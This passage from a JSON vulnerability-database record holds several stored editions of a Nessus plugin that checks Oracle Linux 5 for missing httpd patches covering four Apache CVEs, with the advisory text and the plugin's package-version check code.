"cpe": [], "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053"], "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "edition": 1, "enchantments": {}, "hash": "99b209113ffafb49c860f735b8b3a3ea616bd99bbb2cfcf978fede376ed3999d", "hashmap": [{"hash": "d1dbaeba1e966650b0fbca5997bf675c", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "ba5421b34c575442e1dfc9eefc2b01f3", "key": "title"}, {"hash": "9d4ba84f3eb908a12ad8af29607f5852", "key": "description"}, {"hash": "3c09fd39dca9bce8dafe505ecf682fca", "key": "href"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "be3ffe9319ca8bf2f8c339435e78948f", "key": "modified"}, {"hash": "292f2e293571b0e70e3182b615982dad", "key": "cvss"}, {"hash": "21d1eb58c85fb6f05d58534760094021", "key": "references"}, {"hash": "16ae3c93dc83302d463471eefbc44076", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "7d77095f188ad2b45d2c83a576a305e2", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68488", "id": "ORACLELINUX_ELSA-2012-0323.NASL", "lastseen": "2016-09-26T17:23:03", "modified": "2015-12-01T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.2", "pluginID": "68488", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68488);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2015/12/01 17:07:15 $\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_osvdb_id(76744, 77444, 78293, 78556);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "type": "nessus", "viewCount": 1}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:03"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual"], "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ab49aeb14da9d767c5b0def968c6305f5b4df93fab2ff3a03bdc407f34650da3", "hashmap": [{"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "ba5421b34c575442e1dfc9eefc2b01f3", "key": "title"}, {"hash": "9d4ba84f3eb908a12ad8af29607f5852", "key": "description"}, {"hash": "3c09fd39dca9bce8dafe505ecf682fca", "key": "href"}, {"hash": "2e3c438f66403fd816adabf5a1b82b29", "key": "modified"}, {"hash": "a32f25318843d8ff315ab9875d6d2ee1", "key": "sourceData"}, {"hash": "8f7ef314d920891c344985cdc4f824f1", "key": "cpe"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "21d1eb58c85fb6f05d58534760094021", "key": "references"}, {"hash": "16ae3c93dc83302d463471eefbc44076", "key": "cvelist"}, {"hash": "7d77095f188ad2b45d2c83a576a305e2", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68488", "id": "ORACLELINUX_ELSA-2012-0323.NASL", "lastseen": "2018-08-30T19:29:45", "modified": "2018-07-18T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "68488", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68488);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:29:45"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual"], "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053"], "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ef3d56bbe21de5ffe4d73bd6061a2d2003e01d394c5cec4df8dd78675c1f78d4", "hashmap": [{"hash": "d1dbaeba1e966650b0fbca5997bf675c", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "ba5421b34c575442e1dfc9eefc2b01f3", "key": "title"}, {"hash": "9d4ba84f3eb908a12ad8af29607f5852", "key": "description"}, {"hash": "3c09fd39dca9bce8dafe505ecf682fca", "key": "href"}, {"hash": "8f7ef314d920891c344985cdc4f824f1", "key": "cpe"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "be3ffe9319ca8bf2f8c339435e78948f", "key": "modified"}, {"hash": "292f2e293571b0e70e3182b615982dad", "key": "cvss"}, {"hash": "21d1eb58c85fb6f05d58534760094021", "key": "references"}, {"hash": "16ae3c93dc83302d463471eefbc44076", "key": "cvelist"}, {"hash": "7d77095f188ad2b45d2c83a576a305e2", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68488", "id": "ORACLELINUX_ELSA-2012-0323.NASL", "lastseen": "2017-10-29T13:32:56", "modified": "2015-12-01T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "68488", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68488);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2015/12/01 17:07:15 $\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_osvdb_id(76744, 77444, 78293, 78556);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", 